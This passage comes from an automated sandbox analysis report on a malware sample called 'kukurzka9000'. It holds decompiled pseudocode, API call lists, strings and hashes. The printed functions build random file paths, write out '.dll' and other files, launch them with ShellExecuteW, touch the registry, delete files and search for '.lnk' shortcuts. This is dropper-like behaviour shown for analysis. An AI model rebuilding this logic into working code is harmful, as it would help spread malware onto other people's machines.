							_t97 = _v8;
							L25:
							LocalFree(_t97);
							LocalFree(_v12);
							LocalFree(_t199);
							LocalFree(_v16);
							_t190 =  *((intOrPtr*)( *0x40e18c))(_v32,  *0x40e3a0);
							if(_t190 != 0) {
								continue;
							}
							goto L40;
						}
						_t97 = _v8;
						if( *_t97 != 0x25) {
							goto L25;
						}
						_t21 = _t97 + 2; // 0x407c02
						_t218 = _t21;
						_v24 = _t218;
						_t108 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
						_t137 = _t108;
						_v20 = _t137;
						_t219 =  *((intOrPtr*)( *0x40e18c))(_t218,  *0x40e364);
						if(_t219 == 0) {
							L28:
							LocalFree(_v8);
							LocalFree(_v12);
							LocalFree(_t199);
							LocalFree(_v16);
							goto L29;
						}
						_t221 = _t219 - _v24 >> 1;
						if(E0040A3E4(_v24,  &_v20, 0, _t219 - _v24 >> 1) == 0) {
							_t137 = _v20;
							goto L28;
						}
						_t142 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
						_push(0x208);
						_push(_t142);
						_push(_v20);
						if( *((intOrPtr*)( *0x40e15c))() != 0) {
							_t222 = E0040A503(_t142, _v24 + 2 + _t221 * 2);
							_t122 =  *((intOrPtr*)( *0x40e044))(0x40, 0x209);
							_t183 = 8;
							_t123 = E0040A05F(_t122, _t183);
							_t143 = _t123;
							_push(_t222);
							_v28 = _t123;
							if( *((short*)(_t222 +  *((intOrPtr*)( *0x40e08c))() * 2 - 2)) != 0x5c) {
								_t188 =  *0x40e258; // 0x825ba0
								_t222 = E0040A503(_t222, _t188);
							}
							_t142 = E0040A503(E0040A503(E0040A503(_t222, _t143), "."), _v16);
							_t128 =  *0x40e374; // 0x7f9910
							_v24 = _t128;
							_t223 = E00408619( &_v24);
							if(E00408495(_v12, _t223, _t142) != 0) {
								ShellExecuteW(0, 0, _t142, 0, 0, 0);
							}
							LocalFree(_v28);
							LocalFree(_t223);
						}
						LocalFree(_t142);
						LocalFree(_v20);
						goto L24;
					}
					LocalFree(_t137);
					goto L39;
				}
			}

APIs

LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 004073FE
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 00407762

Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449

LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 00407452
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 004074A6
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 004074FA
ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407673
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 0040767C
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 00407683
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 0040768A
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407693

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 004076C3
LocalFree.KERNEL32(00407C00,?,?,?,?,?,?,00407C00), ref: 004076CD
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 004076D6
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 004076DD
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 004076E6
LocalFree.KERNEL32(00407C00,?,?,?,?,?,?,00407C00), ref: 0040770E
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407717
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 0040771E
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407727
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407735
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 00407744
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 0040774D

Strings

open, xrefs: 004076BD

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Local$Free$Alloc$ExecuteShelllstrlen$Global
String ID: open
API String ID: 4025529775-2758837156
Opcode ID: a1c46eef3cfaacafb93fa33fc14c73831b07a4a1779f76e502dab9b557ed458a
Instruction ID: c37f464f11a496ac5bed0fa78998882daeccb467a6fdaf8c4272b4e6ddd95f6a
Opcode Fuzzy Hash: a1c46eef3cfaacafb93fa33fc14c73831b07a4a1779f76e502dab9b557ed458a
Instruction Fuzzy Hash: 54A1FA72E00215AFDB149BA6DE84D7E7BB5EB44310B004835E905F73A1DB78BD11CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 022B50CF Relevance: 35.4, APIs: 18, Strings: 2, Instructions: 372COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 022B5160

Strings

., xrefs: 022B517E
*.lnk, xrefs: 022B5254

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID: *.lnk$.
API String ID: 2826327444-629149502
Opcode ID: 3150c680f21ee6bfbfefdc720a97a6de524c9d957b265806f1dde896eba8a9dd
Instruction ID: d813e4ec9d2d8e642064f1ddd93c5cbb91b427a00959f023284fc4d1b2bc17cc
Opcode Fuzzy Hash: 3150c680f21ee6bfbfefdc720a97a6de524c9d957b265806f1dde896eba8a9dd
Instruction Fuzzy Hash: 06D1CD71A10216ABDF06DFE5DD44FEE77B6AF48340F004424EA15BB2A0DBB4A961CF64

Uniqueness

Uniqueness Score: -1.00%

Function 022B8AF5 Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 309registryCOMMON

Download Yara Rule

APIs

Part of subcall function 022B9A77: GlobalFree.KERNEL32(022B1F22), ref: 022B9AC4

RegCloseKey.ADVAPI32(00000000), ref: 022B8B3A
LocalFree.KERNEL32(00000000), ref: 022B8BA5
RegCloseKey.ADVAPI32(000F003F), ref: 022B8BAE
RegCloseKey.ADVAPI32(00000000), ref: 022B8CC2
LocalFree.KERNEL32(00000000), ref: 022B8D4B
RegCloseKey.ADVAPI32(000F003F), ref: 022B8D54

Strings

?, xrefs: 022B8B05

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Close$Free$Local$Global
String ID: ?
API String ID: 669500343-1684325040
Opcode ID: 810266c1436c83679cd00da3e4cb33eccda6db4c1c17b890659f6915c65a8da9
Instruction ID: f65215cc359342bce867cb496aa7981f60053896049d0cf11415823135dec60d
Opcode Fuzzy Hash: 810266c1436c83679cd00da3e4cb33eccda6db4c1c17b890659f6915c65a8da9
Instruction Fuzzy Hash: 11B18E74A00219BFDB05CFA6DD85EEE7BB9EF49340F104425FA09B6260D7B49A10CB65

Uniqueness

Uniqueness Score: -1.00%

Function 022BA6EB Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

GetFileSize.KERNEL32(00000000,00000000), ref: 022BA882
LocalFree.KERNEL32(00000000), ref: 022BA961
LocalFree.KERNEL32(?), ref: 022BA96C
LocalFree.KERNEL32(?), ref: 022BA976
LocalFree.KERNEL32(?), ref: 022BA97D
LocalFree.KERNEL32(00000000), ref: 022BA984
CloseHandle.KERNEL32(?), ref: 022BA98F
DeleteFileW.KERNEL32(?), ref: 022BA996
LocalFree.KERNEL32(?), ref: 022BA9F7
LocalFree.KERNEL32(00000000), ref: 022BA9FE
LocalFree.KERNEL32(?), ref: 022BAA08
LocalFree.KERNEL32(00000000), ref: 022BAA0F
LocalFree.KERNEL32(?), ref: 022BAA18
LocalFree.KERNEL32(00000000), ref: 022BAA1F
DeleteFileW.KERNEL32(?), ref: 022BAA26
LocalFree.KERNEL32(?), ref: 022BAA4D
FindClose.KERNEL32(00000000), ref: 022BAA54

Part of subcall function 022B9C82: LocalFree.KERNEL32(?), ref: 022B9D36

Part of subcall function 022BA6EB: LocalFree.KERNEL32(00000000), ref: 022BA7D1

Strings

., xrefs: 022BA760

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$File$CloseDelete$FindHandleSize
String ID: .
API String ID: 948424528-248832578
Opcode ID: 9efa7dd12d013d1a44ae699e025aa845af9bad0d35c456780079ac2c1191b97f
Instruction ID: bc23534fda70af86bf4669e0afe9169a23300414aa6c99c58f2654fb30d6957d
Opcode Fuzzy Hash: 9efa7dd12d013d1a44ae699e025aa845af9bad0d35c456780079ac2c1191b97f
Instruction Fuzzy Hash: CAA1A171214311AFD705DF61DE88E6B77E9EF88740F004928FA55A72A0DBB4E811CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040864C Relevance: 33.2, APIs: 18, Strings: 4, Instructions: 247
memoryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040864C(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t55;
				void* _t61;
				void* _t73;
				void* _t74;
				signed int _t81;
				void* _t83;
				void* _t90;
				signed int _t91;
				void* _t100;
				void* _t101;
				void* _t103;
				signed int _t104;
				void* _t106;
				void* _t107;
				signed int _t111;
				void* _t112;
				void* _t113;
				void* _t115;
				void* _t122;
				signed int _t137;
				intOrPtr _t146;
				void* _t150;
				void* _t152;

				_t115 = __ecx;
				_v32 = __edx;
				_t152 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(__ecx) + _t45);
				_push(_t115);
				_v12 = _t152;
				if( *((intOrPtr*)( *0x40e08c))() == 0x26) {
					L25:
					if(_t152 != 0) {
						LocalFree(_t152);
					}
					return 1;
				} else {
					goto L1;
				}
				do {
					L1:
					_t55 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t115) + _t53);
					_v8 = _t55;
					_t150 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t115) + _t56);
					_v16 = _t150;
					_t61 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t115) + _t59);
					_t152 = _t61;
					_v24 = _t152;
					_t122 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e1ec);
					_t63 = 0;
					_v28 = 0;
					if(_t122 == 0) {
						L3:
						_t8 =  &_v8; // 0x4079e3
						if(E0040A3E4(_t115, _t8, 0, _t63) != 1) {
							goto L17;
						}
						_t73 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e228);
						_v20 = _t73;
						if(_t73 == 0) {
							_t74 = _v12;
							if(_t74 != 0) {
								LocalFree(_t74);
							}
							if(_v8 != 0) {
								LocalFree(_v8);
							}
							if(_t150 != 0) {
								LocalFree(_t150);
							}
							goto L25;
						}
						_push(L"libs");
						_t10 =  &_v8; // 0x4079e3
						_push( *_t10);
						if( *((intOrPtr*)( *0x40e114))() != 0) {
							goto L17;
						}
						_t115 = _t115 + _v28 * 2 + 2;
						_t81 = _v20 - _t115;
						_v20 = _t81 >> 1;
						if(_t81 == 0) {
							L33:
							_t83 = _v12;
							if(_t83 != 0) {
								LocalFree(_t83);
							}
							if(_v8 == 0) {
								L38:
								if(_t150 != 0) {
									LocalFree(_t150);
								}
								if(_t152 != 0) {
									LocalFree(_t152);
								}
								return 0;
							} else {
								LocalFree(_v8);
								L37:
								goto L38;
							}
						}
						_t90 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e1f0);
						if(_t90 == 0) {
							goto L33;
						}
						_t91 = _t90 - _t115;
						_t92 = _t91 >> 1;
						_v28 = _t91 >> 1;
						if(_t91 == 0) {
							goto L33;
						}
						if(E0040A3E4(_t115,  &_v16, 0, _t92) == 0) {
							L16:
							_t150 = _v16;
							goto L17;
						}
						if(E0040A3E4(_t115,  &_v24, _v28 + 1, _v20) == 0) {
							_t152 = _v24;
							goto L16;
						}
						_t100 = E0040A503( *((intOrPtr*)( *0x40e044))(0x40, 0x208), _v32);
						_t146 =  *0x40e258; // 0x825ba0
						_t101 = E0040A503(_t100, _t146);
						_t150 = _v16;
						_t103 = E0040A503(E0040A503(_t101, _t150), L".dll");
						_t137 =  *0x40e374; // 0x7f9910
						_v28 = _t137;
						_v20 = _t103;
						_t104 = E00408619( &_v28);
						_t152 = _v24;
						_v28 = _t104;
						E00408495(_t152, _t104, _t103);
						_t106 = _v28;
						if(_t106 != 0) {
							LocalFree(_t106);
						}
						_t107 = _v20;
						if(_t107 != 0) {
							LocalFree(_t107);
						}
						goto L17;
					}
					_t111 = _t122 - _t115;
					_t63 = _t111 >> 1;
					_v28 = _t111 >> 1;
					if(_t111 < 0) {
						_t112 = _v12;
						if(_t112 != 0) {
							LocalFree(_t112);
						}
						_t37 =  &_v8; // 0x4079e3
						_t113 =  *_t37;
						if(_t113 == 0) {
							goto L38;
						} else {
							LocalFree(_t113);
							goto L37;
						}
					}
					goto L3;
					L17:
					if(_v8 != 0) {
						LocalFree(_v8);
					}
					if(_t150 != 0) {
						LocalFree(_t150);
					}
					if(_t152 != 0) {
						LocalFree(_t152);
					}
					_t34 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e228) + 2; // 0x2
					_t115 = _t34;
					_push(_t115);
				} while ( *((intOrPtr*)( *0x40e08c))() != 0x26);
				_t152 = _v12;
				goto L25;
			}

0x0040865f
0x00408663
0x00408675
0x00408677
0x00408678
0x00408680
0x00408888
0x0040888a
0x0040888d
0x0040888d
0x00000000
0x00000000
0x00000000
0x00000000
0x00408686
0x00408686
0x00408699
0x004086a8
0x004086ba
0x004086c3
0x004086cd
0x004086db
0x004086de
0x004086e3
0x004086e5
0x004086e7
0x004086ec
0x004086fd
0x00408700
0x0040870f
0x00000000
0x00000000
0x00408721
0x00408723
0x00408728
0x004088ea
0x004088ef
0x004088f2
0x004088f2
0x004088fc
0x00408901
0x00408901
0x00408909
0x00408910
0x00408910
0x00000000
0x00408909
0x00408734
0x00408739
0x00408739
0x00408740
0x00000000
0x00000000
0x0040874f
0x00408752
0x00408756
0x00408759
0x004088b3
0x004088b3
0x004088b8
0x004088bb
0x004088bb
0x004088c5
0x004088d0
0x004088d2
0x004088d5
0x004088d5
0x004088dd
0x004088e0
0x004088e0
0x00000000
0x004088c7
0x004088ca
0x004088ca
0x00000000
0x004088ca
0x004088c5
0x0040876b
0x0040876f
0x00000000
0x00000000
0x00408775
0x00408777
0x00408779
0x0040877c
0x00000000
0x00000000
0x00408793
0x0040883b
0x0040883b
0x00000000
0x0040883b
0x004087b0
0x00408838
0x00000000
0x00408838
0x004087c9
0x004087ce
0x004087d6
0x004087db
0x004087ee
0x004087f3
0x004087fb
0x00408801
0x00408804
0x0040880a
0x00408811
0x00408814
0x00408819
0x0040881f
0x00408822
0x00408822
0x00408828
0x0040882d
0x00408830
0x00408830
0x00000000
0x0040882d
0x004086f0
0x004086f2
0x004086f4
0x004086f7
0x0040889b
0x004088a0
0x004088a3
0x004088a3
0x004088a9
0x004088a9
0x004088ae
0x00000000
0x004088b0
0x004088ca
0x00000000
0x004088ca
0x004088ae
0x00000000
0x0040883e
0x00408842
0x00408847
0x00408847
0x0040884f
0x00408852
0x00408852
0x0040885a
0x0040885d
0x0040885d
0x00408871
0x00408871
0x00408879
0x0040887c
0x00408885
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 0040866D
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 00408699
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 004086B2
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 004086CD
LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 00408822
LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 00408830
LocalFree.KERNEL32(00000000), ref: 00408847
LocalFree.KERNEL32(00000000), ref: 00408852
LocalFree.KERNEL32(00000000), ref: 0040885D
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,004079E3), ref: 0040888D
LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 004088A3
LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 004088BB
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,004079E3), ref: 004088CA
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,004079E3), ref: 004088D5
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,004079E3), ref: 004088E0
LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 004088F2
LocalFree.KERNEL32(00000000), ref: 00408901
LocalFree.KERNEL32(00000000), ref: 00408910

Strings

libs, xrefs: 00408734
y@, xrefs: 00408700, 00408739, 004088A9, 004088B0
.dll, xrefs: 004087E7
y@, xrefs: 00408844, 004088FE

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Local$Free$Alloc
String ID: .dll$libs$y@$y@
API String ID: 3098330729-564368970
Opcode ID: 256491809de4a65429cad93a6271d82b62e2b5fb655f29cdfe79702446f82b76
Instruction ID: 52a9afaef70bc3ab584d26b5193ec900674cb85d6b4cf00b99d66efe4c6f1661
Opcode Fuzzy Hash: 256491809de4a65429cad93a6271d82b62e2b5fb655f29cdfe79702446f82b76
Instruction Fuzzy Hash: EE818672A002159BDB04EFA5DF85A6E77B8AB44310B44483EE941F7390DF78ED11CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7DA Relevance: 31.6, APIs: 25, Instructions: 347
memoryCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E0040A7DA(short* __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				signed int _v36;
				void* _v40;
				void* _v44;
				short* _v48;
				void* _v52;
				intOrPtr _v56;
				signed int _v60;
				char _v64;
				void* __ecx;
				void* _t80;
				signed int _t81;
				void* _t84;
				void* _t88;
				void* _t91;
				void* _t94;
				void* _t116;
				void* _t120;
				void* _t139;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				void* _t150;
				void* _t161;
				void* _t162;
				void* _t163;
				intOrPtr _t164;
				char _t206;
				void* _t219;
				void* _t228;
				signed int _t231;
				intOrPtr _t232;
				void* _t235;
				void* _t242;
				signed int _t246;
				signed int _t249;
				void* _t250;
				void* _t251;
				void* _t253;
				void* _t254;

				_v48 = __edx;
				_v28 = _t164;
				_t161 =  *((intOrPtr*)( *0x40e18c))(_t164,  *0x40e2a4);
				if(_t161 == 0) {
					L24:
					return 0;
				}
				while(1) {
					_t162 = _t161 + 0xa;
					_t80 =  *((intOrPtr*)( *0x40e18c))(_t162,  *0x40e1f0);
					_t3 = _t80 + 2; // 0x2
					_t224 = _t3;
					_t81 =  *((intOrPtr*)( *0x40e18c))(_t3,  *0x40e1e8);
					_v36 = _t81;
					_t84 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t82);
					_v8 = _t84;
					_t88 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t86);
					_v12 = _t88;
					_t91 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t89);
					_v16 = _t91;
					_t94 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t92);
					_v20 = _t94;
					_t242 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t95);
					_t100 = _v36 - _t162 >> 1;
					_v24 = _t242;
					_v44 = _v36 - _t162 >> 1;
					if(E0040A3E4(_t162,  &_v8, _t224 - _t162 >> 1, _t100) == 0) {
						break;
					}
					_t228 =  *((intOrPtr*)( *0x40e18c))(_v36 + 2,  *0x40e1e8);
					_t246 = _t228 - _t162 >> 1;
					if(E0040A3E4(_t162,  &_v12, _v44 + 1, _t246) == 0) {
						L20:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v20);
						LocalFree(_v24);
						L22:
						L23:
						goto L24;
					}
					_t21 = _t228 + 2; // 0x2
					_t116 =  *((intOrPtr*)( *0x40e18c))(_t21,  *0x40e1e8);
					_v44 = _t116;
					_t23 = _t246 + 1; // 0x1
					_t231 = _t116 - _t162 >> 1;
					if(E0040A3E4(_t162,  &_v16, _t23, _t231) == 0) {
						goto L20;
					}
					_t120 =  *((intOrPtr*)( *0x40e18c))(_v44 + 2,  *0x40e1e8);
					_v44 = _t120;
					_t27 = _t231 + 1; // 0x1
					_t249 = _t120 - _t162 >> 1;
					if(E0040A3E4(_t162,  &_v20, _t27, _t249) == 0) {
						goto L20;
					}
					_t232 =  *((intOrPtr*)( *0x40e18c))(_v44 + 2,  *0x40e228);
					_v56 = _t232;
					_t32 = _t249 + 1; // 0x1
					if(E0040A3E4(_t162,  &_v24, _t32, _t232 - _t162 >> 1) == 0) {
						goto L20;
					}
					_t250 =  *((intOrPtr*)( *0x40e074))(_v12);
					if(_t250 > 0) {
						_t163 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
						_push(0);
						_push(_t250);
						_push(_t163);
						_push(0);
						if( *((intOrPtr*)( *0x40e0c4))() != 0) {
							_t139 =  *((intOrPtr*)( *0x40e000))(_t163, _t163, _v16);
							_v36 = _v36 & 0x00000000;
							_t163 = _t139;
							_v32 =  *((intOrPtr*)( *0x40e044))(0x40, 0x2000);
							E0040B177(_v8, _t163, _t163, _v20, _v24, _t141,  &_v36);
							_t254 = _t254 + 0x14;
							if(_v36 <= 0) {
								_t251 = _v32;
							} else {
								_t145 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t146 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t219 = 0x10;
								_t147 = E0040A05F(_t145, _t219);
								_t253 = _t147;
								_v52 = _t253;
								_t149 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t146,  *0x40e210), _t253);
								_t206 =  *0x40e204; // 0x825d40
								_v60 = _v60 & 0x00000000;
								_v64 = _t206;
								_v44 = _t149;
								_t150 = E00408619( &_v44);
								_v40 = _t150;
								_t235 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
								 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t253, 0xffffffff, 0, 0, 0, 0);
								if(0 == 0) {
									_t251 = _v32;
								} else {
									 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t253, 0xffffffff, _t235, 0, 0, 0);
									_t251 = _v32;
									if(0 != 0) {
										E00407EDB(_v48, _t235, 0, 0, _v36, _t251, _v40,  &_v64);
										_t254 = _t254 + 0x18;
									}
								}
								LocalFree(_t235);
								LocalFree(_v40);
								LocalFree(_v44);
								LocalFree(_v52);
								_t232 = _v56;
							}
							LocalFree(_t251);
						}
						LocalFree(_t163);
					}
					LocalFree(_v8);
					LocalFree(_v12);
					LocalFree(_v16);
					LocalFree(_v20);
					LocalFree(_v24);
					_t66 = _t232 + 2; // 0x2
					_t161 =  *((intOrPtr*)( *0x40e18c))(_t66,  *0x40e2a4);
					if(_t161 != 0) {
						continue;
					} else {
						goto L23;
					}
				}
				LocalFree(_v8);
				LocalFree(_v12);
				LocalFree(_v16);
				LocalFree(_v20);
				LocalFree(_t242);
				goto L22;
			}

0x0040a7ec
0x0040a7f0
0x0040a7f5
0x0040a7f9
0x0040abd3
0x0040abd7
0x0040abd7
0x0040a801
0x0040a80c
0x0040a810
0x0040a81e
0x0040a81e
0x0040a822
0x0040a833
0x0040a83d
0x0040a848
0x0040a857
0x0040a868
0x0040a872
0x0040a883
0x0040a88d
0x0040a89e
0x0040a8aa
0x0040a8b8
0x0040a8be
0x0040a8c1
0x0040a8cd
0x00000000
0x00000000
0x0040a8ee
0x0040a8f4
0x0040a904
0x0040ab7d
0x0040ab80
0x0040ab89
0x0040ab92
0x0040ab9b
0x0040abcb
0x0040abcb
0x0040abd1
0x00000000
0x0040abd2
0x0040a916
0x0040a91a
0x0040a91e
0x0040a923
0x0040a926
0x0040a938
0x00000000
0x00000000
0x0040a951
0x0040a955
0x0040a95a
0x0040a95d
0x0040a96f
0x00000000
0x00000000
0x0040a98a
0x0040a991
0x0040a999
0x0040a9a8
0x00000000
0x00000000
0x0040a9b8
0x0040a9bc
0x0040a9d7
0x0040a9d9
0x0040a9db
0x0040a9dc
0x0040a9dd
0x0040a9e3
0x0040a9f3
0x0040a9f5
0x0040a9f9
0x0040aa0c
0x0040aa1d
0x0040aa22
0x0040aa29
0x0040ab21
0x0040aa2f
0x0040aa3c
0x0040aa49
0x0040aa4d
0x0040aa52
0x0040aa63
0x0040aa66
0x0040aa6f
0x0040aa74
0x0040aa7a
0x0040aa7e
0x0040aa84
0x0040aa87
0x0040aa99
0x0040aaa4
0x0040aab5
0x0040aab9
0x0040aaf7
0x0040aabb
0x0040aad0
0x0040aad2
0x0040aad7
0x0040aaed
0x0040aaf2
0x0040aaf2
0x0040aad7
0x0040aafb
0x0040ab04
0x0040ab0d
0x0040ab16
0x0040ab1c
0x0040ab1c
0x0040ab25
0x0040ab25
0x0040ab2c
0x0040ab2c
0x0040ab35
0x0040ab3e
0x0040ab47
0x0040ab50
0x0040ab59
0x0040ab6b
0x0040ab71
0x0040ab75
0x00000000
0x0040ab7b
0x00000000
0x0040ab7b
0x0040ab75
0x0040aba9
0x0040abb2
0x0040abbb
0x0040abc4
0x0040abcb
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A83D
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A857
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A872
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A88D
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A8A8

Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB2C

Part of subcall function 0040B177: LocalFree.KERNEL32(00000000), ref: 0040B25D
Part of subcall function 0040B177: LocalFree.KERNEL32(?), ref: 0040B4D9
Part of subcall function 0040B177: FindClose.KERNEL32(00000000), ref: 0040B4E0

LocalFree.KERNEL32(?), ref: 0040AB25

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000), ref: 0040AAFB
LocalFree.KERNEL32(?), ref: 0040AB04
LocalFree.KERNEL32(?), ref: 0040AB0D
LocalFree.KERNEL32(?), ref: 0040AB16
LocalFree.KERNEL32(00407B9D,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB35
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB3E
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB47
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB50
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB59
LocalFree.KERNEL32(00407B9D,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB80
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB89
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB92
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB9B
